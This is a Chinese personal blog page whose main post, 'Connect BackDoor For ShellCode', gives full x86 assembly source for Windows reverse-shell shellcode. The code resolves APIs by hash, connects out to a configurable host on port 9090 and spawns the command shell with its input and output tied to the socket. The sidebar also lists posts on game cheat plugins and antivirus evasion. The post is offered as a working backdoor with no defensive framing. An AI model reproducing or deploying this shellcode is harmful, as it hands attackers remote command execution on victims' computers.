-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [12/21]长沙南方职业技术学院一班主任殴打学生
- [12/20]获取网卡、硬盘、CPU硬件信息
- [12/16]北京欢迎你之盗版
- [12/12]飞信登录时的身份验证
- [12/12]Fetion分析之一:飞信协议类型
- [11/29]某论坛网友因涉嫌揭露政府黑幕被追捕
- [11/29]小哈第二天......
- [11/27]为我的小哈"祈福"
- [11/26]新"成员"---小哈
- [11/23]J8hacker.com 再度开启了....支持
- [11/23]柏拉图式的爱情
- [11/21]女人新标准
- [11/20]编写QQ显IP外挂插件及原理分析
- [11/20]程中加垃圾代码防杀毒
- [11/18]【17日紧急求助】一个父亲的求救,儿子遭歹徒绑架
-
最新评论
-
文章归档
-
Statistics
- 文章总数:194
- 评论总数:67
- 引用总数:0
- 浏览总数:240437
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
-
反向链接
Connect BackDoor For ShellCode
.586.model flat
locals @@
include \D.N.ASM\include\useful.inc
include \D.N.ASM\include\MZ.INC
include \D.N.ASM\include\PE.INC
;ADDRESS equ 127,0,0,1
PORT equ 9090
.code
public c entry
db '$SHELLCODE_BEGIN$'
entry:
call @@delta
@@delta:
pop edi
sub edi,offset @@delta
;======代码重定位
lea eax,[edi+k32_api]
push eax
call get_apicrc
lea eax,[edi+w32_api]
push eax
call get_apicrc
;======以上代码从定位+获取API地址
sub ebp,ebp
sub esp,190h
mov esi,esp
push esp
push 1
call [edi+__WSAStartup]
push 000434550h
push 0534d4f43h
mov eax,esp
push 104h
push esi
push eax
call [edi+__GetEnvironmentVariableA]
pop ecx
pop ecx
@@online:
push 6
push 1
push 2
call [edi+__socket]
mov ebx,eax
lea edx,[edi+offset DNS]
push edx
call [edi+__inet_addr]
inc eax
jz @@hostname
dec eax
jmp short @@port
@@hostname:
lea edx,[edi+offset DNS]
push edx
call [edi+__gethostbyname]
or eax,eax
jz @@hostname
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
@@port:
push ebp
push ebp
push eax
mov eax,PORT
xchg ah,al
shl eax,16
add eax,2
push eax
mov edx,esp
@@connection:
push 16
push edx
push ebx
call [edi+__connect]
test eax,eax
jnz @@connection
@@next:
push ebx
push ebx
push ebx
push ebp
push ebp
push 257
push 11
pop ecx
@@loop_push:
push ebp
loop @@loop_push
mov eax,esp
push ebp
push ebp
push ebp
push ebp
push esp
push eax
push ebp
push ebp
push ebp
push 1
push ebp
push ebp
push ebp
push esi
call [edi+__CreateProcessA]
test eax,eax
jz @@quit
push -1
push eax
call [edi+__WaitForSingleObject]
@@quit:
push ebx
call [edi+__closesocket]
call [edi+__WSACleanup]
;push 0
;call [edi+__ExitThread]
;jmp @@online
;add esp,4*127
ret
;============所需数据============================
DNS db 'localhost',0
k32_api:
db 'kernel32',0
__ExitThread dd 080AF62E1h
__GetEnvironmentVariableA dd 02F87D308h
__WaitForSingleObject dd 0E058BB45h
__CreateProcessA dd 0A851D916h
dd 0
w32_api:
db 'ws2_32',0
__WSAStartup dd 0A0F5FC93h
__WSACleanup dd 08E3398BCh
__socket dd 005E568BBh
__inet_addr dd 05308A87Eh
__gethostbyname dd 0377545A2h
__connect dd 074CFF91Fh
__closesocket dd 0A5C6D777h
dd 0
get_apicrc:
pushad
mov esi,[esp+8*4+4]
call get_k32base
push 03FC1BD8Dh ;LoadLibraryA
push eax
call get_addr32crc
push esi
call eax
mov ebx,eax
sub eax,eax
lodsb
test al,al
jnz $-3
mov edi,esi
@@loop:
lodsd
test eax,eax
jz @@end
push eax
push ebx
call get_addr32crc
stosd
jmp @@loop
@@end:
popad
retn
get_addr32crc:
pushad
mov ebx,[esp+8*4+4]
mov esi,[esp+8*4+8]
sub ebp,ebp ;counter
mov edx,ebx
add edx,[edx.mz_neptr]
mov edx,[edx.pe_exportrva]
add edx,ebx
mov eax,[edx.ex_numofnamepointers]
mov edi,[edx.ex_addresstablerva]
add edi,ebx
mov edi,[edx.ex_namepointersrva]
add edi,ebx
push edx
mov edx,edi
@@next:
mov edx,[edi]
add edx,ebx
inc ebp
pushad
mov esi,edx
sub ecx,ecx
lodsb
inc ecx
test al,al
jnz $-4
mov [esp+pushad_ecx],ecx
popad
@@cmpstr:
pushad
; mov edx,edx
sub eax,eax
call xcrc32
cmp eax,esi
popad
jz @@found
; push eax
; sub eax,eax
; scasb
; jnz $-1
; pop eax
add edi,4
dec eax
jz @@error
jmp @@next
@@found:
pop edx
dec ebp
mov ecx,[edx.ex_ordinaltablerva]
add ecx,ebx
movzx eax,wod [ecx+ebp*2]
mov ebp,[edx.ex_addresstablerva]
add ebp,ebx
mov eax,[ebp+eax*4]
add eax,ebx
@@error:
mov [esp+pushad_eax],eax
popad
ret 4*2
;void* get_k32base();
get_k32base:
pushad
sub eax,eax
mov eax,fs:[eax+30h]
test eax,eax
js @@os_9x
@@os_nt:
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov eax,[eax+8]
jmp @@finished
@@os_9x:
mov eax,[eax+34h]
lea eax,[eax+7ch]
mov eax,[eax+3ch]
@@finished:
mov [esp+pushad_eax],eax
popad
retn
; zhengxi's crc32(): optimised by vecna
; input: EDX=data, ECX=size, EAX=crc
; output: EAX=crc, EDX+=ECX, ECX=BL=0
xcrc32:
pushad
jecxz @@4
not eax
@@1:
cmp byte ptr [edx], 0
je @@4
xor al, [edx]
inc edx
mov bl, 8
@@2:
shr eax, 1
jnc @@3
xor eax, 0EDB88320h
@@3:
dec bl
jnz @@2
loop @@1
@@4:
not eax
mov [esp+pushad_eax],eax
popad
ret
db '$SHELLCODE_END$'
shellcode_size equ $-entry
mov eax,shellcode_size
push eax
callw ExitProcess
end
0 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri